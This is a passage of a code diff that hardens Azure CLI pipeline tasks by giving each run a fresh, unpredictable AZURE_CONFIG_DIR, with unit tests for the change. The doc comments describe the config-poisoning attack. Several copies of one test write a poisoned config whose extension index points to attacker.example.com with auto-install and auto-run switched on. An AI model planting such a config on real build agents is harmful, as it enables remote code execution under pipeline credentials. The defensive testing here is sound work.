+        throw new Error('agentTempDir is required');
+    }
+    return fs.mkdtempSync(path.join(agentTempDir, '.azclitask-'));
+}
+
+/**
+ * Removes a directory previously created by
+ * createPerInvocationAzureConfigDir and unsets the AZURE_CONFIG_DIR env
+ * var. Safe to call in `finally` — never throws; logs to tl.debug on
+ * failure so a broken cleanup cannot mask the original task error.
+ */
+export function removePerInvocationAzureConfigDir(configPath: string | null | undefined): void {
+    if (!configPath) {
+        return;
+    }
+    tl.debug(`Removing per-invocation AZURE_CONFIG_DIR: ${configPath}`);
+    try {
+        tl.rmRF(configPath);
+    } catch (rmErr) {
+        const msg = (rmErr && (rmErr as Error).message) || String(rmErr);
+        tl.debug(`Failed to remove AZURE_CONFIG_DIR: ${msg}`);
+    }
+    try {
+        delete process.env['AZURE_CONFIG_DIR'];
+    } catch { /* ignore */ }
+}

--- a/_generated/AzureCLIV1/Tests/L0.ts
+++ b/_generated/AzureCLIV1/Tests/L0.ts
@@ -3,9 +3,14 @@ import path = require('path');
 import os = require('os');
 
 import * as ttm from 'azure-pipelines-task-lib/mock-test';
+import { runConfigDirIsolationTests } from './L0ConfigDirIsolation';
 
 describe('AzureCLIV1 Suite', function () {
     this.timeout(20000);
+
+    describe('AZURE_CONFIG_DIR isolation', () => {
+        runConfigDirIsolationTests();
+    });
 
     // Use cross-platform temp directory for assertions
     const tempDir = require('os').tmpdir();

--- a/_generated/AzureCLIV1/Tests/L0ConfigDirIsolation.ts
+++ b/_generated/AzureCLIV1/Tests/L0ConfigDirIsolation.ts
@@ -1,0 +1,121 @@
+import assert = require('assert');
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from '../src/AzureCliConfigDir';
+
+export function runConfigDirIsolationTests() {
+    describe('createPerInvocationAzureConfigDir (security hardening)', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+        });
+
+        it('creates a brand-new directory under the agent temp root', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert(fs.existsSync(dir), 'config dir should exist on disk');
+                assert(fs.statSync(dir).isDirectory(), 'should be a directory');
+                assert(path.dirname(dir) === fs.realpathSync(agentTemp) || path.dirname(dir) === agentTemp,
+                    `config dir parent should be agent temp, got ${path.dirname(dir)}`);
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('does NOT use the predictable ".azclitask" path that the vulnerable code used', () => {
+            const vulnerablePath = path.join(agentTemp, '.azclitask');
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, vulnerablePath,
+                    'must not use the fixed predictable path attackable by pre-seeding');
+                assert(path.basename(dir).startsWith('.azclitask-'),
+                    `basename should start with ".azclitask-" (got "${path.basename(dir)}")`);
+                assert(path.basename(dir).length > '.azclitask-'.length,
+                    'mkdtemp must append a random suffix');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('produces a different directory on each invocation', () => {
+            const a = createPerInvocationAzureConfigDir(agentTemp);
+            const b = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(a, b, 'two invocations must yield distinct dirs');
+            } finally {
+                fs.rmSync(a, { recursive: true, force: true });
+                fs.rmSync(b, { recursive: true, force: true });
+            }
+        });
+
+        it('ignores an attacker-pre-seeded ".azclitask/config" in the agent temp', () => {
+            // Simulate the exact attack: a prior step writes a poisoned config at the
+            // predictable path the vulnerable task used to point AZURE_CONFIG_DIR at.
+            const poisonedDir = path.join(agentTemp, '.azclitask');
+            fs.mkdirSync(poisonedDir, { recursive: true });
+            const poisonedConfig = path.join(poisonedDir, 'config');
+            fs.writeFileSync(poisonedConfig,
+                '[extension]\nindex_url = https://attacker.example.com/index.json\n' +
+                'use_dynamic_install = yes_without_prompt\n' +
+                'run_after_dynamic_install = True\n');
+
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, poisonedDir,
+                    'new config dir must not be the attacker-controlled predictable path');
+                assert(!fs.existsSync(path.join(dir, 'config')),
+                    'newly-created config dir must not contain a pre-seeded config file');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('throws when agentTempDir is empty/undefined', () => {
+            assert.throws(() => createPerInvocationAzureConfigDir(undefined as any));
+            assert.throws(() => createPerInvocationAzureConfigDir(''));
+        });
+    });
+
+    describe('removePerInvocationAzureConfigDir', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+            delete process.env['AZURE_CONFIG_DIR'];
+        });
+
+        it('removes the directory (even when it contains files left by az)', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            fs.writeFileSync(path.join(dir, 'config'), '[extension]\nindex_url = x\n');
+            fs.mkdirSync(path.join(dir, 'cliextensions'));
+            process.env['AZURE_CONFIG_DIR'] = dir;
+            removePerInvocationAzureConfigDir(dir);
+            assert(!fs.existsSync(dir), 'directory must be gone after cleanup');
+            assert(process.env['AZURE_CONFIG_DIR'] === undefined,
+                'AZURE_CONFIG_DIR env var must be unset after cleanup');
+        });
+
+        it('is a no-op for null/empty inputs (safe in finally)', () => {
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(null));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(undefined));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(''));
+        });
+
+        it('never throws when the path does not exist', () => {
+            const ghost = path.join(agentTemp, '.azclitask-ghost00');
+            assert(!fs.existsSync(ghost));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(ghost));
+        });
+    });
+}

--- a/_generated/AzureCLIV1/azureclitask.ts
+++ b/_generated/AzureCLIV1/azureclitask.ts
@@ -5,6 +5,7 @@ import fs = require("fs");
 import os = require("os");
 import { getHandlerFromToken, WebApi } from "azure-devops-node-api";
 import { ITaskApi } from "azure-devops-node-api/TaskApi";
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from "./src/AzureCliConfigDir";
 
 const nodeVersion = parseInt(process.version.split('.')[0].replace('v', ''));
 if (nodeVersion > 16) {
@@ -117,6 +118,11 @@ export class azureclitask {
                 tl.rmRF(this.cliPasswordPath);
             }
 
+            if (this.azCliConfigPath) {
+                removePerInvocationAzureConfigDir(this.azCliConfigPath);
+                this.azCliConfigPath = null;
+            }
+
             //set the task result to either succeeded or failed based on error was thrown or not
             if (toolExecutionError) {
                 let message = tl.loc('ScriptFailed', toolExecutionError);
@@ -160,6 +166,7 @@ export class azureclitask {
 
     private static isLoggedIn: boolean = false;
     private static cliPasswordPath: string = null;
+    private static azCliConfigPath: string = null;
     private static servicePrincipalId: string = null;
     private static servicePrincipalKey: string = null;
     private static federatedToken: string = null;
@@ -229,10 +236,14 @@ export class azureclitask {
             return;
         }
 
-        if (!!tl.getVariable('Agent.TempDirectory')) {
-            var azCliConfigPath = path.join(tl.getVariable('Agent.TempDirectory'), ".azclitask");
-            console.log(tl.loc('SettingAzureConfigDir', azCliConfigPath));
-            process.env['AZURE_CONFIG_DIR'] = azCliConfigPath;
+        const agentTempDir = tl.getVariable('Agent.TempDirectory');
+        if (!!agentTempDir) {
+            // Security: create an unpredictable per-invocation
+            // directory so an earlier pipeline step cannot pre-seed a poisoned
+            // az config file at $(Agent.TempDirectory)/.azclitask/config.
+            this.azCliConfigPath = createPerInvocationAzureConfigDir(agentTempDir);
+            console.log(tl.loc('SettingAzureConfigDir', this.azCliConfigPath));
+            process.env['AZURE_CONFIG_DIR'] = this.azCliConfigPath;
         } else {
             console.warn(tl.loc('GlobalCliConfigAgentVersionWarning'));
         }

--- a/_generated/AzureCLIV1/src/AzureCliConfigDir.ts
+++ b/_generated/AzureCLIV1/src/AzureCliConfigDir.ts
@@ -1,0 +1,59 @@
+import * as fs from 'fs';
+import * as path from 'path';
+import * as tl from 'azure-pipelines-task-lib/task';
+
+/**
+ * AZURE_CONFIG_DIR isolation helper for the AzureCLI@1/@2/@3 tasks.
+ *
+ * NOTE: this file is intentionally duplicated under
+ * Tasks/AzureCLIV1/src, Tasks/AzureCLIV2/src and Tasks/AzureCLIV3/src.
+ * Each AzureCLI task is shipped as a self-contained npm package and the
+ * repo convention is to keep small, task-coupled helpers in the task
+ * folder rather than introduce a new shared package. Keep all three
+ * copies in sync when changing this file.
+ *
+ * Background: the legacy code pointed AZURE_CONFIG_DIR at the predictable
+ * path $(Agent.TempDirectory)/.azclitask which allowed any earlier
+ * pipeline step running on the same agent to pre-seed a poisoned `config`
+ * file (e.g. extension.index_url / use_dynamic_install /
+ * run_after_dynamic_install) and achieve code execution under the
+ * service-connection identity once the AzureCLI task subsequently invoked
+ * `az`. Creating a fresh, unpredictable directory per invocation closes
+ * that gap.
+ */
+
+/**
+ * Creates a per-invocation, unpredictable AZURE_CONFIG_DIR under the
+ * supplied agent temp directory. Returns the absolute path. The directory
+ * has the form `${agentTempDir}/.azclitask-XXXXXX` where XXXXXX is six
+ * cryptographically-random alphanumeric characters chosen by libuv
+ * (filesystem-safe on every supported OS).
+ */
+export function createPerInvocationAzureConfigDir(agentTempDir: string): string {
+    if (!agentTempDir) {
+        throw new Error('agentTempDir is required');
+    }
+    return fs.mkdtempSync(path.join(agentTempDir, '.azclitask-'));
+}
+
+/**
+ * Removes a directory previously created by
+ * createPerInvocationAzureConfigDir and unsets the AZURE_CONFIG_DIR env
+ * var. Safe to call in `finally` — never throws; logs to tl.debug on
+ * failure so a broken cleanup cannot mask the original task error.
+ */
+export function removePerInvocationAzureConfigDir(configPath: string | null | undefined): void {
+    if (!configPath) {
+        return;
+    }
+    tl.debug(`Removing per-invocation AZURE_CONFIG_DIR: ${configPath}`);
+    try {
+        tl.rmRF(configPath);
+    } catch (rmErr) {
+        const msg = (rmErr && (rmErr as Error).message) || String(rmErr);
+        tl.debug(`Failed to remove AZURE_CONFIG_DIR: ${msg}`);
+    }
+    try {
+        delete process.env['AZURE_CONFIG_DIR'];
+    } catch { /* ignore */ }
+}

--- a/_generated/AzureCLIV1_Node24/Tests/L0.ts
+++ b/_generated/AzureCLIV1_Node24/Tests/L0.ts
@@ -3,9 +3,14 @@ import path = require('path');
 import os = require('os');
 
 import * as ttm from 'azure-pipelines-task-lib/mock-test';
+import { runConfigDirIsolationTests } from './L0ConfigDirIsolation';
 
 describe('AzureCLIV1 Suite', function () {
     this.timeout(20000);
+
+    describe('AZURE_CONFIG_DIR isolation', () => {
+        runConfigDirIsolationTests();
+    });
 
     // Use cross-platform temp directory for assertions
     const tempDir = require('os').tmpdir();

--- a/_generated/AzureCLIV1_Node24/Tests/L0ConfigDirIsolation.ts
+++ b/_generated/AzureCLIV1_Node24/Tests/L0ConfigDirIsolation.ts
@@ -1,0 +1,121 @@
+import assert = require('assert');
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from '../src/AzureCliConfigDir';
+
+export function runConfigDirIsolationTests() {
+    describe('createPerInvocationAzureConfigDir (security hardening)', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+        });
+
+        it('creates a brand-new directory under the agent temp root', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert(fs.existsSync(dir), 'config dir should exist on disk');
+                assert(fs.statSync(dir).isDirectory(), 'should be a directory');
+                assert(path.dirname(dir) === fs.realpathSync(agentTemp) || path.dirname(dir) === agentTemp,
+                    `config dir parent should be agent temp, got ${path.dirname(dir)}`);
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('does NOT use the predictable ".azclitask" path that the vulnerable code used', () => {
+            const vulnerablePath = path.join(agentTemp, '.azclitask');
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, vulnerablePath,
+                    'must not use the fixed predictable path attackable by pre-seeding');
+                assert(path.basename(dir).startsWith('.azclitask-'),
+                    `basename should start with ".azclitask-" (got "${path.basename(dir)}")`);
+                assert(path.basename(dir).length > '.azclitask-'.length,
+                    'mkdtemp must append a random suffix');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('produces a different directory on each invocation', () => {
+            const a = createPerInvocationAzureConfigDir(agentTemp);
+            const b = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(a, b, 'two invocations must yield distinct dirs');
+            } finally {
+                fs.rmSync(a, { recursive: true, force: true });
+                fs.rmSync(b, { recursive: true, force: true });
+            }
+        });
+
+        it('ignores an attacker-pre-seeded ".azclitask/config" in the agent temp', () => {
+            // Simulate the exact attack: a prior step writes a poisoned config at the
+            // predictable path the vulnerable task used to point AZURE_CONFIG_DIR at.
+            const poisonedDir = path.join(agentTemp, '.azclitask');
+            fs.mkdirSync(poisonedDir, { recursive: true });
+            const poisonedConfig = path.join(poisonedDir, 'config');
+            fs.writeFileSync(poisonedConfig,
+                '[extension]\nindex_url = https://attacker.example.com/index.json\n' +
+                'use_dynamic_install = yes_without_prompt\n' +
+                'run_after_dynamic_install = True\n');
+
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, poisonedDir,
+                    'new config dir must not be the attacker-controlled predictable path');
+                assert(!fs.existsSync(path.join(dir, 'config')),
+                    'newly-created config dir must not contain a pre-seeded config file');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('throws when agentTempDir is empty/undefined', () => {
+            assert.throws(() => createPerInvocationAzureConfigDir(undefined as any));
+            assert.throws(() => createPerInvocationAzureConfigDir(''));
+        });
+    });
+
+    describe('removePerInvocationAzureConfigDir', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+            delete process.env['AZURE_CONFIG_DIR'];
+        });
+
+        it('removes the directory (even when it contains files left by az)', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            fs.writeFileSync(path.join(dir, 'config'), '[extension]\nindex_url = x\n');
+            fs.mkdirSync(path.join(dir, 'cliextensions'));
+            process.env['AZURE_CONFIG_DIR'] = dir;
+            removePerInvocationAzureConfigDir(dir);
+            assert(!fs.existsSync(dir), 'directory must be gone after cleanup');
+            assert(process.env['AZURE_CONFIG_DIR'] === undefined,
+                'AZURE_CONFIG_DIR env var must be unset after cleanup');
+        });
+
+        it('is a no-op for null/empty inputs (safe in finally)', () => {
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(null));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(undefined));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(''));
+        });
+
+        it('never throws when the path does not exist', () => {
+            const ghost = path.join(agentTemp, '.azclitask-ghost00');
+            assert(!fs.existsSync(ghost));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(ghost));
+        });
+    });
+}

--- a/_generated/AzureCLIV1_Node24/azureclitask.ts
+++ b/_generated/AzureCLIV1_Node24/azureclitask.ts
@@ -5,6 +5,7 @@ import fs = require("fs");
 import os = require("os");
 import { getHandlerFromToken, WebApi } from "azure-devops-node-api";
 import { ITaskApi } from "azure-devops-node-api/TaskApi";
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from "./src/AzureCliConfigDir";
 
 const nodeVersion = parseInt(process.version.split('.')[0].replace('v', ''));
 if (nodeVersion > 16) {
@@ -117,6 +118,11 @@ export class azureclitask {
                 tl.rmRF(this.cliPasswordPath);
             }
 
+            if (this.azCliConfigPath) {
+                removePerInvocationAzureConfigDir(this.azCliConfigPath);
+                this.azCliConfigPath = null;
+            }
+
             //set the task result to either succeeded or failed based on error was thrown or not
             if (toolExecutionError) {
                 let message = tl.loc('ScriptFailed', toolExecutionError);
@@ -160,6 +166,7 @@ export class azureclitask {
 
     private static isLoggedIn: boolean = false;
     private static cliPasswordPath: string = null;
+    private static azCliConfigPath: string = null;
     private static servicePrincipalId: string = null;
     private static servicePrincipalKey: string = null;
     private static federatedToken: string = null;
@@ -229,10 +236,14 @@ export class azureclitask {
             return;
         }
 
-        if (!!tl.getVariable('Agent.TempDirectory')) {
-            var azCliConfigPath = path.join(tl.getVariable('Agent.TempDirectory'), ".azclitask");
-            console.log(tl.loc('SettingAzureConfigDir', azCliConfigPath));
-            process.env['AZURE_CONFIG_DIR'] = azCliConfigPath;
+        const agentTempDir = tl.getVariable('Agent.TempDirectory');
+        if (!!agentTempDir) {
+            // Security: create an unpredictable per-invocation
+            // directory so an earlier pipeline step cannot pre-seed a poisoned
+            // az config file at $(Agent.TempDirectory)/.azclitask/config.
+            this.azCliConfigPath = createPerInvocationAzureConfigDir(agentTempDir);
+            console.log(tl.loc('SettingAzureConfigDir', this.azCliConfigPath));
+            process.env['AZURE_CONFIG_DIR'] = this.azCliConfigPath;
         } else {
             console.warn(tl.loc('GlobalCliConfigAgentVersionWarning'));
         }

--- a/_generated/AzureCLIV1_Node24/src/AzureCliConfigDir.ts
+++ b/_generated/AzureCLIV1_Node24/src/AzureCliConfigDir.ts
@@ -1,0 +1,59 @@
+import * as fs from 'fs';
+import * as path from 'path';
+import * as tl from 'azure-pipelines-task-lib/task';
+
+/**
+ * AZURE_CONFIG_DIR isolation helper for the AzureCLI@1/@2/@3 tasks.
+ *
+ * NOTE: this file is intentionally duplicated under
+ * Tasks/AzureCLIV1/src, Tasks/AzureCLIV2/src and Tasks/AzureCLIV3/src.
+ * Each AzureCLI task is shipped as a self-contained npm package and the
+ * repo convention is to keep small, task-coupled helpers in the task
+ * folder rather than introduce a new shared package. Keep all three
+ * copies in sync when changing this file.
+ *
+ * Background: the legacy code pointed AZURE_CONFIG_DIR at the predictable
+ * path $(Agent.TempDirectory)/.azclitask which allowed any earlier
+ * pipeline step running on the same agent to pre-seed a poisoned `config`
+ * file (e.g. extension.index_url / use_dynamic_install /
+ * run_after_dynamic_install) and achieve code execution under the
+ * service-connection identity once the AzureCLI task subsequently invoked
+ * `az`. Creating a fresh, unpredictable directory per invocation closes
+ * that gap.
+ */
+
+/**
+ * Creates a per-invocation, unpredictable AZURE_CONFIG_DIR under the
+ * supplied agent temp directory. Returns the absolute path. The directory
+ * has the form `${agentTempDir}/.azclitask-XXXXXX` where XXXXXX is six
+ * cryptographically-random alphanumeric characters chosen by libuv
+ * (filesystem-safe on every supported OS).
+ */
+export function createPerInvocationAzureConfigDir(agentTempDir: string): string {
+    if (!agentTempDir) {
+        throw new Error('agentTempDir is required');
+    }
+    return fs.mkdtempSync(path.join(agentTempDir, '.azclitask-'));
+}
+
+/**
+ * Removes a directory previously created by
+ * createPerInvocationAzureConfigDir and unsets the AZURE_CONFIG_DIR env
+ * var. Safe to call in `finally` — never throws; logs to tl.debug on
+ * failure so a broken cleanup cannot mask the original task error.
+ */
+export function removePerInvocationAzureConfigDir(configPath: string | null | undefined): void {
+    if (!configPath) {
+        return;
+    }
+    tl.debug(`Removing per-invocation AZURE_CONFIG_DIR: ${configPath}`);
+    try {
+        tl.rmRF(configPath);
+    } catch (rmErr) {
+        const msg = (rmErr && (rmErr as Error).message) || String(rmErr);
+        tl.debug(`Failed to remove AZURE_CONFIG_DIR: ${msg}`);
+    }
+    try {
+        delete process.env['AZURE_CONFIG_DIR'];
+    } catch { /* ignore */ }
+}

--- a/_generated/AzureCLIV2/Tests/L0.ts
+++ b/_generated/AzureCLIV2/Tests/L0.ts
@@ -4,6 +4,7 @@ import path = require('path');
 import * as ttm from 'azure-pipelines-task-lib/mock-test';
 import { runValidateScriptArgsTests } from './L0ValidateScriptArgs';
 import { runTryValidateScriptArgsTests } from './L0TryValidateScriptArgs';
+import { runConfigDirIsolationTests } from './L0ConfigDirIsolation';
 
 describe('AzureCLIV2 Suite', function () {
     this.timeout(30000);
@@ -14,6 +15,10 @@ describe('AzureCLIV2 Suite', function () {
 
     describe('Args validation feature flag (EnableAzureCliArgsValidation)', () => {
         runTryValidateScriptArgsTests();
+    });
+
+    describe('AZURE_CONFIG_DIR isolation', () => {
+        runConfigDirIsolationTests();
     });
 
     it('LateBoundIdToken: Feature Flag ON, Token Present -> Uses Token, Emits Telemetry', async () => {

--- a/_generated/AzureCLIV2/Tests/L0ConfigDirIsolation.ts
+++ b/_generated/AzureCLIV2/Tests/L0ConfigDirIsolation.ts
@@ -1,0 +1,121 @@
+import assert = require('assert');
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from '../src/AzureCliConfigDir';
+
+export function runConfigDirIsolationTests() {
+    describe('createPerInvocationAzureConfigDir (security hardening)', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+        });
+
+        it('creates a brand-new directory under the agent temp root', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert(fs.existsSync(dir), 'config dir should exist on disk');
+                assert(fs.statSync(dir).isDirectory(), 'should be a directory');
+                assert(path.dirname(dir) === fs.realpathSync(agentTemp) || path.dirname(dir) === agentTemp,
+                    `config dir parent should be agent temp, got ${path.dirname(dir)}`);
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('does NOT use the predictable ".azclitask" path that the vulnerable code used', () => {
+            const vulnerablePath = path.join(agentTemp, '.azclitask');
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, vulnerablePath,
+                    'must not use the fixed predictable path attackable by pre-seeding');
+                assert(path.basename(dir).startsWith('.azclitask-'),
+                    `basename should start with ".azclitask-" (got "${path.basename(dir)}")`);
+                assert(path.basename(dir).length > '.azclitask-'.length,
+                    'mkdtemp must append a random suffix');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('produces a different directory on each invocation', () => {
+            const a = createPerInvocationAzureConfigDir(agentTemp);
+            const b = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(a, b, 'two invocations must yield distinct dirs');
+            } finally {
+                fs.rmSync(a, { recursive: true, force: true });
+                fs.rmSync(b, { recursive: true, force: true });
+            }
+        });
+
+        it('ignores an attacker-pre-seeded ".azclitask/config" in the agent temp', () => {
+            // Simulate the exact attack: a prior step writes a poisoned config at the
+            // predictable path the vulnerable task used to point AZURE_CONFIG_DIR at.
+            const poisonedDir = path.join(agentTemp, '.azclitask');
+            fs.mkdirSync(poisonedDir, { recursive: true });
+            const poisonedConfig = path.join(poisonedDir, 'config');
+            fs.writeFileSync(poisonedConfig,
+                '[extension]\nindex_url = https://attacker.example.com/index.json\n' +
+                'use_dynamic_install = yes_without_prompt\n' +
+                'run_after_dynamic_install = True\n');
+
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, poisonedDir,
+                    'new config dir must not be the attacker-controlled predictable path');
+                assert(!fs.existsSync(path.join(dir, 'config')),
+                    'newly-created config dir must not contain a pre-seeded config file');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('throws when agentTempDir is empty/undefined', () => {
+            assert.throws(() => createPerInvocationAzureConfigDir(undefined as any));
+            assert.throws(() => createPerInvocationAzureConfigDir(''));
+        });
+    });
+
+    describe('removePerInvocationAzureConfigDir', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+            delete process.env['AZURE_CONFIG_DIR'];
+        });
+
+        it('removes the directory (even when it contains files left by az)', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            fs.writeFileSync(path.join(dir, 'config'), '[extension]\nindex_url = x\n');
+            fs.mkdirSync(path.join(dir, 'cliextensions'));
+            process.env['AZURE_CONFIG_DIR'] = dir;
+            removePerInvocationAzureConfigDir(dir);
+            assert(!fs.existsSync(dir), 'directory must be gone after cleanup');
+            assert(process.env['AZURE_CONFIG_DIR'] === undefined,
+                'AZURE_CONFIG_DIR env var must be unset after cleanup');
+        });
+
+        it('is a no-op for null/empty inputs (safe in finally)', () => {
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(null));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(undefined));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(''));
+        });
+
+        it('never throws when the path does not exist', () => {
+            const ghost = path.join(agentTemp, '.azclitask-ghost00');
+            assert(!fs.existsSync(ghost));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(ghost));
+        });
+    });
+}

--- a/_generated/AzureCLIV2/azureclitask.ts
+++ b/_generated/AzureCLIV2/azureclitask.ts
@@ -10,6 +10,7 @@ import { getHandlerFromToken, WebApi } from "azure-devops-node-api";
 import { ITaskApi } from "azure-devops-node-api/TaskApi";
 import { validateAzModuleVersion } from "azure-pipelines-tasks-azure-arm-rest/azCliUtility";
 import { tryValidateScriptArgs, ArgsSanitizingError } from "./src/argsSanitizer";
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from "./src/AzureCliConfigDir";
 
 const nodeVersion = parseInt(process.version.split('.')[0].replace('v', ''));
 if (nodeVersion > 16) {
@@ -147,12 +148,21 @@ export class azureclitask {
             }
 
             if (scriptType) {
-                await scriptType.cleanUp();
+                try {
+                    await scriptType.cleanUp();
+                } catch (cleanupErr) {
+                    tl.debug(`scriptType.cleanUp() threw: ${cleanupErr && cleanupErr.message || cleanupErr}`);
+                }
             }
 
             if (this.cliPasswordPath) {
                 tl.debug('Removing spn certificate file');
                 tl.rmRF(this.cliPasswordPath);
+            }
+
+            if (this.azCliConfigPath) {
+                removePerInvocationAzureConfigDir(this.azCliConfigPath);
+                this.azCliConfigPath = null;
             }
 
             //set the task result to either succeeded or failed based on error was thrown or not
@@ -223,6 +233,7 @@ export class azureclitask {
 
     private static isLoggedIn: boolean = false;
     private static cliPasswordPath: string = null;
+    private static azCliConfigPath: string = null;
     private static servicePrincipalId: string = null;
     private static servicePrincipalKey: string = null;
     private static federatedToken: string = null;
@@ -354,13 +365,20 @@ export class azureclitask {
             return;
         }
 
-        if (!!tl.getVariable('Agent.TempDirectory')) {
-            var azCliConfigPath = path.join(tl.getVariable('Agent.TempDirectory'), ".azclitask");
-            console.log(tl.loc('SettingAzureConfigDir', azCliConfigPath));
-            process.env['AZURE_CONFIG_DIR'] = azCliConfigPath;
-        } else {
+        const tempDir = tl.getVariable('Agent.TempDirectory');
+        if (!tempDir) {
             console.warn(tl.loc('GlobalCliConfigAgentVersionWarning'));
+            return;
         }
+
+        // Security: use a freshly-created, unpredictable per-invocation directory
+        // so that an earlier step cannot pre-seed $(Agent.TempDirectory)/.azclitask/config
+        // with a poisoned extension.index_url (security hardening).
+        // fs.mkdtempSync creates a brand-new directory; the random suffix prevents
+        // attacker pre-seeding and the tight perms come from the agent temp root.
+        this.azCliConfigPath = createPerInvocationAzureConfigDir(tempDir);
+        console.log(tl.loc('SettingAzureConfigDir', this.azCliConfigPath));
+        process.env['AZURE_CONFIG_DIR'] = this.azCliConfigPath;
     }
 
     private static setAzureCloudBasedOnServiceEndpoint(): void {

--- a/_generated/AzureCLIV2/src/AzureCliConfigDir.ts
+++ b/_generated/AzureCLIV2/src/AzureCliConfigDir.ts
@@ -1,0 +1,59 @@
+import * as fs from 'fs';
+import * as path from 'path';
+import * as tl from 'azure-pipelines-task-lib/task';
+
+/**
+ * AZURE_CONFIG_DIR isolation helper for the AzureCLI@1/@2/@3 tasks.
+ *
+ * NOTE: this file is intentionally duplicated under
+ * Tasks/AzureCLIV1/src, Tasks/AzureCLIV2/src and Tasks/AzureCLIV3/src.
+ * Each AzureCLI task is shipped as a self-contained npm package and the
+ * repo convention is to keep small, task-coupled helpers in the task
+ * folder rather than introduce a new shared package. Keep all three
+ * copies in sync when changing this file.
+ *
+ * Background: the legacy code pointed AZURE_CONFIG_DIR at the predictable
+ * path $(Agent.TempDirectory)/.azclitask which allowed any earlier
+ * pipeline step running on the same agent to pre-seed a poisoned `config`
+ * file (e.g. extension.index_url / use_dynamic_install /
+ * run_after_dynamic_install) and achieve code execution under the
+ * service-connection identity once the AzureCLI task subsequently invoked
+ * `az`. Creating a fresh, unpredictable directory per invocation closes
+ * that gap.
+ */
+
+/**
+ * Creates a per-invocation, unpredictable AZURE_CONFIG_DIR under the
+ * supplied agent temp directory. Returns the absolute path. The directory
+ * has the form `${agentTempDir}/.azclitask-XXXXXX` where XXXXXX is six
+ * cryptographically-random alphanumeric characters chosen by libuv
+ * (filesystem-safe on every supported OS).
+ */
